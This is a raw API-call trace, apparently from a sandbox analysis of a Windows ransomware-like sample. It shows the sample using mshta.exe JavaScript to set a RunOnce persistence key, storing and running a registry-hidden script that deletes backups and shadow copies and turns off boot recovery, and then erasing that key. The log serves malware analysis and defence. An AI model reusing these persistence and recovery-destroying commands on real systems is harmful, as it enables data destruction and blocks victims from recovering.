CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", cchWideChar=259, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", lpUsedDefaultChar=0x0) returned 259 [0060.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) 
returned 1 [0060.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", cchWideChar=109, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", lpUsedDefaultChar=0x0) returned 109 [0060.433] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.433] SysReAllocStringLen (in: pbstr=0x18fda4*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x109 | out: pbstr=0x18fda4*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.433] SysReAllocStringLen (in: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new 
ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x109 | out: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.433] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpStartupInfo=0x18fdd4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fdc4 | out: lpCommandLine="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", lpProcessInformation=0x18fdc4*(hProcess=0xe8, hThread=0x174, dwProcessId=0x7bc, dwThreadId=0x544)) returned 1 [0060.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4044d8, lpParameter=0x1ea1b10, dwCreationFlags=0x0, lpThreadId=0x441220 | out: 
lpThreadId=0x441220*=0x5cc) returned 0x164 [0060.444] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.444] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.444] GlobalUnlock (hMem=0x45000c) returned 0 [0060.445] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.445] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.445] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.445] GlobalUnlock (hMem=0x45000c) returned 0 [0060.445] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.445] GlobalUnlock (hMem=0x450004) returned 0 [0060.445] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.445] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.445] GlobalUnlock (hMem=0x450004) returned 0 [0060.445] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.445] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.445] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.445] GlobalUnlock (hMem=0x450004) returned 0 [0060.446] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.446] GlobalUnlock (hMem=0x45000c) returned 0 [0060.446] GlobalLock (hMem=0x45000c) returned 0x588f38 [0060.446] GlobalHandle (pMem=0x588f38) returned 0x45000c [0060.446] GlobalUnlock (hMem=0x45000c) returned 0 [0060.446] GlobalLock (hMem=0x45000c) returned 0x588f38 [0060.446] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.446] GlobalHandle (pMem=0x588f38) returned 0x45000c [0060.446] GlobalUnlock (hMem=0x45000c) returned 0 [0060.446] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.446] GlobalUnlock (hMem=0x450004) returned 0 [0060.446] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdd4 | out: lpPerformanceCount=0x18fdd4*=18080092340) returned 1 [0060.446] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdd4 | out: lpPerformanceCount=0x18fdd4*=18080100571) returned 1 [0060.446] GlobalLock (hMem=0x450004) returned 0x588f38 [0060.446] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.446] GlobalUnlock (hMem=0x450004) returned 0 [0060.447] GlobalLock (hMem=0x450004) returned 
0x588f38 [0060.447] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.447] GlobalHandle (pMem=0x588f38) returned 0x450004 [0060.447] GlobalUnlock (hMem=0x450004) returned 0 [0060.447] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.447] GlobalUnlock (hMem=0x45000c) returned 0 [0060.447] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\[M[ZF", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x18fdb4, lpdwDisposition=0x18fdb8 | out: phkResult=0x18fdb4*=0x170, lpdwDisposition=0x18fdb8*=0x1) returned 0x0 [0060.447] RegSetValueExA (in: hKey=0x170, lpValueName="HMEYE", Reserved=0x0, dwType=0x1, lpData="o=new ActiveXObject(\"WScript.Shell\");o.Run(\"cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\",0);o.Run(\"cmd.exe /c wmic SHADOWCOPY DELETE\",0);o.Run(\"cmd.exe /c vssadmin Delete Shadows /All /Quiet\",0);o.Run(\"cmd.exe /c bcdedit /set {default} recoveryenabled No\",0);o.Run(\"cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures\",0);", cbData=0x164 | out: lpData="o=new ActiveXObject(\"WScript.Shell\");o.Run(\"cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\",0);o.Run(\"cmd.exe /c wmic SHADOWCOPY DELETE\",0);o.Run(\"cmd.exe /c vssadmin Delete Shadows /All /Quiet\",0);o.Run(\"cmd.exe /c bcdedit /set {default} recoveryenabled No\",0);o.Run(\"cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures\",0);") returned 0x0 [0060.448] RegCloseKey (hKey=0x170) returned 0x0 [0060.448] GlobalLock (hMem=0x45000c) returned 0x588f38 [0060.448] GlobalHandle (pMem=0x588f38) returned 0x45000c [0060.448] GlobalUnlock (hMem=0x45000c) returned 0 [0060.448] GlobalLock (hMem=0x45000c) returned 0x588f38 [0060.448] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.448] GlobalHandle (pMem=0x588f38) returned 0x45000c [0060.448] GlobalUnlock (hMem=0x45000c) returned 0 [0060.448] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.448] GlobalUnlock (hMem=0x450004) returned 0 
[0060.448] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e3eb48, cbMultiByte=104, lpWideCharStr=0x18ede8, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"쯘W\x18㱴矇㲣矇\x9d矍\x18άU") returned 104 [0060.449] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e544d8, cbMultiByte=5, lpWideCharStr=0x18ede4, cchWideChar=2047 | out: lpWideCharStr="[M[ZFta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"쯘W\x18㱴矇㲣矇\x9d矍\x18άU") returned 5 [0060.449] SysReAllocStringLen (in: pbstr=0x18fde0*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"", len=0x68 | out: pbstr=0x18fde0*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"") returned 1 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"", cchWideChar=104, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"e", lpUsedDefaultChar=0x0) returned 104 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="~", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="~ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="\\\\!$));close();\"", cchWideChar=16, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\!$));close();\"cript:eval(new 
ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\~\\\\!$));close();\"e", lpUsedDefaultChar=0x0) returned 16 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="~", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="~ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.449] SysReAllocStringLen (in: pbstr=0x18fe2c*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"", len=0x6c | out: pbstr=0x18fe2c*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"") returned 1 [0060.449] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"", cchWideChar=108, lpMultiByteStr=0x18edec, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"e", lpUsedDefaultChar=0x0) returned 108 [0060.449] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e45e78, cbMultiByte=108, lpWideCharStr=0x18ede8, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"㱴矇㲣矇\x9d矍\x18άU") returned 108 [0060.450] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e54518, cbMultiByte=5, lpWideCharStr=0x18ede4, cchWideChar=2047 | out: lpWideCharStr="HMEYEta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"㱴矇㲣矇\x9d矍\x18άU") returned 5 [0060.450] SysReAllocStringLen (in: pbstr=0x18fde0*=0x0, psz="mshta.exe \"javascript:eval(new 
ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"", len=0x6c | out: pbstr=0x18fde0*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"") returned 1 [0060.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"", cchWideChar=108, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"a", lpUsedDefaultChar=0x0) returned 108 [0060.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$));close();\"", cchWideChar=13, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$));close();\"vascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\!$));close();\"a", lpUsedDefaultChar=0x0) returned 13 [0060.450] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.450] SysReAllocStringLen (in: pbstr=0x18fe20*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", len=0x70 | out: pbstr=0x18fe20*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"") returned 1 [0060.450] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=112, lpMultiByteStr=0x18edec, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"l", lpUsedDefaultChar=0x0) returned 112 [0060.450] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e45ef8, cbMultiByte=112, lpWideCharStr=0x18ede8, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"\x9d矍\x18άU") returned 112 [0060.451] SysReAllocStringLen (in: pbstr=0x18fde0*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", len=0x70 | out: pbstr=0x18fde0*="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"") returned 1 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=112, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject($WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 112 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=66, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WScript.Shell$).RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"ead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 66 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=").RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=52, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=").RegRead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"E$));close();\"ead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 52 [0060.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"", cchWideChar=41, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\");close();\"E$));close();\"ead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 41 [0060.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.452] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="));close();\"", cchWideChar=12, lpMultiByteStr=0x18edac, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="));close();\"re\\\\[M[ZF\\\\HMEYE$));close();\");close();\"E$));close();\"ead($HKCU\\\\Software\\\\[M[ZF\\\\HMEYE$));close();\"(", lpUsedDefaultChar=0x0) returned 12 [0060.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="$", cchWideChar=1, lpMultiByteStr=0x18eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.452] SysReAllocStringLen (in: pbstr=0x18fe14*=0x0, psz="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"", len=0x70 | out: pbstr=0x18fe14*="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"") returned 1 [0060.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"", cchWideChar=112, lpMultiByteStr=0x18edec, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"l", lpUsedDefaultChar=0x0) returned 112 [0060.453] WinExec (lpCmdLine="mshta.exe \"javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();\"", uCmdShow=0x0) returned 0x21 [0074.322] Sleep (dwMilliseconds=0x1f4) [0074.823] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20006, phkResult=0x18fdec | out: phkResult=0x18fdec*=0x170) returned 0x0 [0074.824] RegDeleteKeyA (hKey=0x170, lpSubKey="[M[ZF") returned 0x0 [0074.824] RegCloseKey (hKey=0x170) returned 0x0 [0074.825] GlobalLock 
(hMem=0x45000c) returned 0x588f38 [0074.825] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.825] GlobalUnlock (hMem=0x45000c) returned 0 [0074.825] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.825] GlobalLock (hMem=0x450004) returned 0x56f100 [0074.825] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.825] GlobalUnlock (hMem=0x45000c) returned 0 [0074.825] GlobalHandle (pMem=0x56f100) returned 0x450004 [0074.825] GlobalUnlock (hMem=0x450004) returned 0 [0074.825] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.825] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.825] GlobalUnlock (hMem=0x450004) returned 0 [0074.826] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.826] GlobalLock (hMem=0x45000c) returned 0x56f100 [0074.826] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.826] GlobalUnlock (hMem=0x450004) returned 0 [0074.826] GlobalHandle (pMem=0x56f100) returned 0x45000c [0074.826] GlobalUnlock (hMem=0x45000c) returned 0 [0074.826] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.826] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.826] GlobalUnlock (hMem=0x45000c) returned 0 [0074.826] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.826] GlobalLock (hMem=0x450004) returned 0x56f100 [0074.826] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.826] GlobalUnlock (hMem=0x45000c) returned 0 [0074.826] GlobalHandle (pMem=0x56f100) returned 0x450004 [0074.826] GlobalUnlock (hMem=0x450004) returned 0 [0074.826] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20006, phkResult=0x18fd4c | out: phkResult=0x18fd4c*=0x0) returned 0x2 [0074.826] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.826] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.826] GlobalUnlock (hMem=0x450004) returned 0 [0074.827] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.827] GlobalLock (hMem=0x45000c) returned 0x56f100 [0074.827] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.827] GlobalUnlock 
(hMem=0x450004) returned 0 [0074.827] GlobalHandle (pMem=0x56f100) returned 0x45000c [0074.827] GlobalUnlock (hMem=0x45000c) returned 0 [0074.829] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd00 | out: lpPerformanceCount=0x18fd00*=19518419267) returned 1 [0074.830] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcf8 | out: lpPerformanceCount=0x18fcf8*=19518426782) returned 1 [0074.830] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcf0 | out: lpPerformanceCount=0x18fcf0*=19518434098) returned 1 [0074.830] QueryPerformanceCounter (in: lpPerformanceCount=0x18fce8 | out: lpPerformanceCount=0x18fce8*=19518440344) returned 1 [0074.830] QueryPerformanceCounter (in: lpPerformanceCount=0x18fce0 | out: lpPerformanceCount=0x18fce0*=19518446252) returned 1 [0074.830] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.830] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.830] GlobalUnlock (hMem=0x45000c) returned 0 [0074.830] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.830] GlobalLock (hMem=0x450004) returned 0x56f100 [0074.830] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.830] GlobalUnlock (hMem=0x45000c) returned 0 [0074.830] GlobalHandle (pMem=0x56f100) returned 0x450004 [0074.830] GlobalUnlock (hMem=0x450004) returned 0 [0074.830] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.830] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.830] GlobalUnlock (hMem=0x450004) returned 0 [0074.830] GlobalLock (hMem=0x450004) returned 0x588f38 [0074.830] GlobalLock (hMem=0x45000c) returned 0x56f100 [0074.830] GlobalHandle (pMem=0x588f38) returned 0x450004 [0074.830] GlobalUnlock (hMem=0x450004) returned 0 [0074.830] GlobalHandle (pMem=0x56f100) returned 0x45000c [0074.830] GlobalUnlock (hMem=0x45000c) returned 0 [0074.831] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.831] GlobalHandle (pMem=0x588f38) returned 0x45000c [0074.831] GlobalUnlock (hMem=0x45000c) returned 0 [0074.831] GlobalLock (hMem=0x45000c) returned 0x588f38 [0074.831] 
